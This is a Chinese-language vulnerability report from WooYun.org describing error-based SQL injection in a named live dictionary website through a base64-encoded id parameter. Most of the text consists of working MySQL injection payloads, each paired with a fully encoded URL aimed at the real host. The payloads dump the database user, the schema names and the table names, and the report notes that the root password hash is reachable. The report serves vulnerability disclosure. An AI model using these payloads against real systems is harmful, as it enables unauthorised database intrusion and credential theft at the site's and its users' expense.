WooYun.org

0x00
注入URL：http://zidian.aies.cn/?id=MzM2OQ== （id为注入点，使用了base64加密，但未对参数进行过滤，造成显错SQL注入）ps：该站点下http://cidian.aies.cn/ 也同样存在相同的问题
由于使用sqlmap被禁ip，所以采用手注
0x01
构造payload：

1038 and (select 11 from (select count(*), concat(floor(rand(0)*2),0x23,(select concat(user(),':',database())))x from information_schema.tables group by x )a)

url:http://zidian.aies.cn/?id=MTAzOCBhbmQgKHNlbGVjdCAxMSBmcm9tIChzZWxlY3QgY291bnQoKiksIGNvbmNhdChmbG9vcihyYW5kKDApKjIpLDB4MjMsKHNlbGVjdCBjb25jYXQodXNlcigpLCc6JyxkYXRhYmFzZSgpKSkpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeCApYSk=
注出当前数据库及用户
构造payload：

1038 and (select 11 from (select count(*), concat(floor(rand(0)*2),0x23,(select schema_name from information_schema.schemata limit 0,1))x from information_schema.tables group by x )a)

url：http://zidian.aies.cn/?id=MTAzOCBhbmQgKHNlbGVjdCAxMSBmcm9tIChzZWxlY3QgY291bnQoKiksIGNvbmNhdChmbG9vcihyYW5kKDApKjIpLDB4MjMsKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHggKWEp
注出数据库名
构造payload：

1038 and (select 11 from (select count(*), concat(floor(rand(0)*2),0x23,(select table_name from information_schema.tables where table_schema ='asass' limit 0,1))x from information_schema.tables group by x )a)

url：http://zidian.aies.cn/?id=MTAzOCBhbmQgKHNlbGVjdCAxMSBmcm9tIChzZWxlY3QgY291bnQoKiksIGNvbmNhdChmbG9vcihyYW5kKDApKjIpLDB4MjMsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWEgPSdhc2FzcycgbGltaXQgMCwxKSl4IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBncm91cCBieSB4IClhKQ==
注出表名
mysql库，可以得到root用户密码，接下去就不脱了：D